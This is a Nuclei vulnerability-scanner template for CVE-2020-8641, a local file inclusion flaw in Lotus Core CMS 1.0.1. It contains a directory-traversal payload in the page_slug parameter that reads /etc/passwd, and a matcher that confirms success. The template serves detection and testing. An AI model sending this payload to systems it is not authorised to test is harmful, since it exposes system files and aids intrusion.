nuclei-templates/cves/2020/CVE-2020-8641.yaml

36 lines
915 B
YAML

id: CVE-2020-8641
info:
name: Lotus Core CMS 1.0.1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
reference:
- https://cxsecurity.com/issue/WLB-2020010234
- https://www.exploit-db.com/exploits/47985
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-8641
cwe-id: CWE-22
tags: cve2020,lfi,lotus,cms,edb,cve
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/28